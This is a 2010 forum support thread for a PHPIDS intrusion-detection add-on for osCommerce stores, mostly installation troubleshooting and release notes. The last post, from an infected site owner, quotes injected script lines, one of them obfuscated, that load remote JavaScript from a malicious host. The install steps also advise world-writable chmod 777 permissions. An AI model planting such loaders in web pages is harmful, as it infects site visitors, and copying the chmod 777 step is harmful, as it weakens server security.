celextel Posted June 1, 2010 Author Posted June 1, 2010 Thanks for That Celextel, I have had this logged about 15 times today - so I have made the code changes you suggested. Is there a quick way to clear the log? Thanks We would try to include this function "Clear All Logs" in the next version. Quote
celextel Posted June 1, 2010 Author Posted June 1, 2010 Hi, Just installed on my second web-site and now I am getting the following error when trying to carry out the first test: Line 170 is $this->handle = new PDO( I have checked the installation several times and cant see where the error may be, so I have had to revert my application_top.php back to the pre-mod condition. Thanks Perhaps you do not have the database installed. Please do that or go through each of the step carefully. Quote
Mort-lemur Posted June 1, 2010 Posted June 1, 2010 Hi Celextel, Found the problem - PDO was not enabled on the server that hosts my second site. Host has now configured it and it works fine Thanks Quote Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.
celextel Posted June 1, 2010 Author Posted June 1, 2010 Hi Celextel, Found the problem - PDO was not enabled on the server that hosts my second site. Host has now configured it and it works fine Thanks Okay. Thanks for this info. Quote
Mort-lemur Posted June 4, 2010 Posted June 4, 2010 Hi, I Have just been testing my site as a bogus shopper. When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7. Would I be safe adding the following to my exclusions to stop this happening all the time: Request.products_id Get.products_id Post.products_id Thanks Quote Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.
celextel Posted June 4, 2010 Author Posted June 4, 2010 Hi, I Have just been testing my site as a bogus shopper. When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7. Would I be safe adding the following to my exclusions to stop this happening all the time: Request.products_id Get.products_id Post.products_id Thanks It should be safe to add these under exclusions. We do not have this issue in our website. Are you using Ajax based shopping cart? Quote
celextel Posted June 6, 2010 Author Posted June 6, 2010 NEW!! PHPIDS for osCommerce 1.5 1. PHPIDS main configuration and Table creation codes moved to new installer file. 2. Link added to the PHPIDS Log Report file in the admin for deleting all log entries by a single click. Quote
Mort-lemur Posted June 6, 2010 Posted June 6, 2010 Hi, We do not have this issue in our website. Are you using Ajax based shopping cart? Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think. Thanks Quote Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.
celextel Posted June 6, 2010 Author Posted June 6, 2010 Hi, Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think. Thanks Okay, thanks. Quote
celextel Posted June 6, 2010 Author Posted June 6, 2010 NEW!! PHPIDS 0.6.4 is ready 1. Download "PHPIDS 0.6.4 (ZIP)" at the following page: http://php-ids.org/downloads/ 2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids". 3. Make sure that this renamed directory has the following directories directly in it: docs lib tests 4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory overwriting the old files. Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 Thanks for the fast reply. The contribution works so well, and the install was straight forward. One small change I have made is that I have taken the HTML element of the "Blocked.php" file from the IP trap contribution and included it in the banned.php file, so now rather than a "plain" banned page people who get banned will get the banned page with "Stop" image and black and red text etc. If anyone is interested I will post the code for the new banned.php here Thanks Yes, I am interested in seeing the code. Also, I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions? Thanks, ed Quote
celextel Posted June 6, 2010 Author Posted June 6, 2010 (edited) I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions? Thanks, ed IP Trap contribution is not ours. Yes, you have to go in the reverse of the install instructions to un-install that. It should not be difficult. Edited June 6, 2010 by celextel Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 After running the installer I received this: New Table for PHPIDS Log Report Created! New Table for Banned IP Created! Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133 All still ok? thanks. ed Quote
celextel Posted June 6, 2010 Author Posted June 6, 2010 (edited) After running the installer I received this: New Table for PHPIDS Log Report Created! New Table for Banned IP Created! Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133 All still ok? thanks. ed Perhaps installer has already installed PHPIDS configuration settings. Please Check. If not, run the installer again. Edited June 6, 2010 by celextel Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 This looks to be a great contribution so thank you in advance, however, I am having a few problems. Test 1 Shows this: Your IP address has been logged -- Your IP is: 173.27.14.172 You shouldn't be here, so go away! Versus what was in the documentation for 6.3 Test 2 Shows this: Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Browse to homepage Shows this: 1146 - Table 'dreamdol_ecom.TABLE_BANNED_IP' doesn't exist select ip_address from TABLE_BANNED_IP where ip_status='0' [TEP STOP] Looking at phpMyAdmin shows 2 new tables - banned_ip & phpids_intrusions Step A - includes/modules/osc_phpids.php Currenly reads: $oscBasePath = DIR_WS_INCLUDES; $basePath = $oscBasePath . 'phpids/lib/' Does not look like I need to mod the base path using v6.4 even though I don't have a catalog folder (installed in root by host) or is this my problem above? thanks, ed Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 I fixed the home page error regarding the missing DB table ... missed one update to includes/database_tables.php (oops) Any thoughts on the others? thanks, ed Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 The plot thickens ... I added my IP to the banned IP list through the admin site. I got a vanilla banned message but when I clicked "Contact Us" ... I got this: Fatal error: Call to a member function add_current_page() on a non-object in /home3/dreamdol/public_html/includes/application_top.php on line 397 Removed my IP from banned and same error no matter what page I try to go to! Everything was working fine with this mod installed for over thirty minutes so hard to believe a core problem with application_top. Please help thanks, ed Quote
ehendley Posted June 6, 2010 Posted June 6, 2010 Well, I got rid of the fatal error with a reboot ... even though I cleared my cache I guess it was stuck in a session ... So, ignore my last post ... will continue testing. Still need help on the earlier post though. thanks, ed Quote
celextel Posted June 7, 2010 Author Posted June 7, 2010 This looks to be a great contribution so thank you in advance, however, I am having a few problems. Test 1 Shows this: Your IP address has been logged -- Your IP is: 173.27.14.172 You shouldn't be here, so go away! Versus what was in the documentation for 6.3 Test 2 Shows this: Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. thanks, ed Do you have any other contribution like XS shield installed? PHPIDS would not work with XS shield. >> You shouldn't be here, so go away! We do not have this warning message in PHPIDS. You need to find out as to which contribution is generating this message. It could be also from the server. >> Internal Server Error This is not related to PHPIDS. You should create a support request with the web host to do the needful in regard to this [error handling]. Please refer to the first page of this thread in regard to this: Just to clarify, no, that's not a 404 you're getting. It's a 406. The 404 comes from not having your own error document (e.g., /406.shtml) for error 406. It's stupid to configure Apache that way (report a 404 when it can't find your error handler), but that's how most servers have it. Read http://www.catskilltech.com/freeSW/SMF/faqs/index.html#errorpages Quote
Guest Posted June 13, 2010 Posted June 13, 2010 I try to get to my site and I am getting Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90 Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90 what did I fortget Quote
celextel Posted June 13, 2010 Author Posted June 13, 2010 I try to get to my site and I am getting Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90 Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90 what did I fortget It is not finding the Init.php file inside the phpids directory. Please make sure that you have gone through following "Step-A: Core" carefully: 1. Download "PHPIDS 0.6.4 (ZIP)" or the latest version at: http://php-ids.org/downloads/ 2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids". 3. Make sure that this renamed directory has the following directories directly in it: docs lib tests 4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory. If you upload this to some other directory, you need to change oscBasePath to this path in the includes/modules/osc_phpids.php file. 5. Grant write access [chmod 777] to the "tmp" folder [phpids/lib/IDS/tmp] and also to phpids_log.txt log file which is inside the "tmp" folder. The last step is also most important. Quote
celextel Posted June 13, 2010 Author Posted June 13, 2010 NEW!! PHPIDS for osCommerce 1.6 1. A coding error / logical error has been corrected and usage of $_SERVER['PHP_SELF'] has been changed for security reasons in the banned_ip module file. 2. Usage of $_SERVER['PHP_SELF'] has been changed in the phpids_installer.php file. 3. PHPIDS 0.6.4 is ready. Overwrite the old files. Quote
infobroker Posted June 14, 2010 Posted June 14, 2010 I have installed PHPIDS for osCommerce 1.6. On my localhost it works without any problems. But on the server I get get an error message: Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92 I think it could be the PHP-Version: localhost: 5.2.3 Server: 4.4.9 How we can change the code? Quote
celextel Posted June 14, 2010 Author Posted June 14, 2010 I have installed PHPIDS for osCommerce 1.6. On my localhost it works without any problems. But on the server I get get an error message: Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92 I think it could be the PHP-Version: localhost: 5.2.3 Server: 4.4.9 How we can change the code? Yes, this works only in PHP 5. Changing the codes would be difficult. Refer to the following URL in regard to this: http://forum.php-ids.org/comments.php?DiscussionID=25&page=1#Item_0 convince your hoster to provide PHP5 or change your hoster. Drupal, phpMyAdmin, etc. pp. won't support PHP4 nevertheless in a few months. So I do not see why we should support an outdated platform. Quote
pablito21050 Posted June 16, 2010 Posted June 16, 2010 Hello, I just found a virus on my site: includes/general.js line 192 document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>'); includes/languages/english/index.php also german, spanish and italian line 42 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> admin/index.php line 12 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> my_admin_name/index.php line 124 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> and so on, more than 20 files infected; the security mod will not prevent this. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.